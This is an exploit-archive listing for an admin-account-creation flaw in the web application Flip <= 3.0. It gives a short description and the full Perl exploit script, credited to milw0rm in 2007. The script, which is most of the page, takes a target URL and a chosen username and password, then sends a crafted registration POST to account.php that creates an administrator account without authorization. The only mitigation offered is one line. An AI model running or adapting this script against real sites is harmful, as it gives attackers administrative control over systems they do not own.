Flip - exploit.company

vendor:

Flip

by:

undefined1_

5.5

CVSS

MEDIUM

Admin Creation

CWE

Product Name: Flip

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Flip <= 3.0

This Perl script exploits a vulnerability in the Flip <= 3.0 application that allows an attacker to create an admin account. The script takes a URL as input and prompts the user for a desired username and password. It then sends a POST request to the target URL with the necessary parameters to create the admin account. If successful, the script prints 'OK'.

Mitigation:

The vendor should release a patch to fix this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/perl

use strict; 
use IO::Socket;
use Getopt::Std;

my $app = "Flip <= 3.0";
my $type = "Admin Creation";
my $author = "undefined1_";
my $vendor = "http://sourceforge.net/projects/flipsource";

my %opt;
getopts("t:", \%opt);
$| = 1;
print ":: $app $type - by $author - www.undef1.com ::\n\n\n";

my $url = $opt{t} || usage();

if($url =~ m/^(?:http:\/\/)(.*)/) {
	$url = $1;
}
if($url !~ m/^.*\/$/) {
	$url .= "/";
}

print "username you want: ";
my $user = <STDIN>;
print "password you want: ";
my $pass = <STDIN>;
chomp($user);
chomp($pass);

create_admin($url, $user, $pass);

sub create_admin {
	my $url = shift;
	my $user = shift;
	my $pass = shift;
	
	print "creating admin ... \t";
	my $content  = "un=$user&em=aaa][3\@gmail.com&pw1=$pass&pw2=$pass";
	my $data = "POST " . parse_page($url . "account.php?op=register") . " HTTP/1.1\r\n";
	$data .= "Host: " . parse_host($url) . "\r\n";
	$data .= "Connection: close\r\n";
	$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
	$data .= "Content-Length: " . length($content) . "\r\n\r\n";
	my $recv = sendpacket(parse_host($url), parse_port($url), $data.$content);

	if($recv !~ m/Successfully registered!/m) {
		print "failed\n";
		return;
	}	
	print "OK\n";		
}



# ======================================================

sub parse_host {
	my $url = shift;
	if($url =~ m/^([^\/:]+).*\//) {
		return $1;
}
	return "127.0.0.1";
}

sub parse_port {
	my $url = shift;
	if($url =~ m/^(?:[^\/:]+):(\d+)\//) {
		return $1;
}
	return "80";
}

sub parse_page {
	my $url = shift;
	if($url =~ m/^(?:[^\/]+)(\/.*)/) {
		return $1;
	}
	return "/";
}


sub sendpacket {
	my $server = shift;
	my $port = shift;
	my $data = shift;

	my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => $port) or die ":: Could not connect to $server:80 $!\n";
	print $sock "$data";
	
	$data = "";
	my $resp;
	while($resp = <$sock>)	{ $data .= $resp; }
	
	close($sock);
	return $data;
}

sub usage() {
	printf "usage: %s -t<url>\n", $0;
	exit;
}

# milw0rm.com [2007-09-20]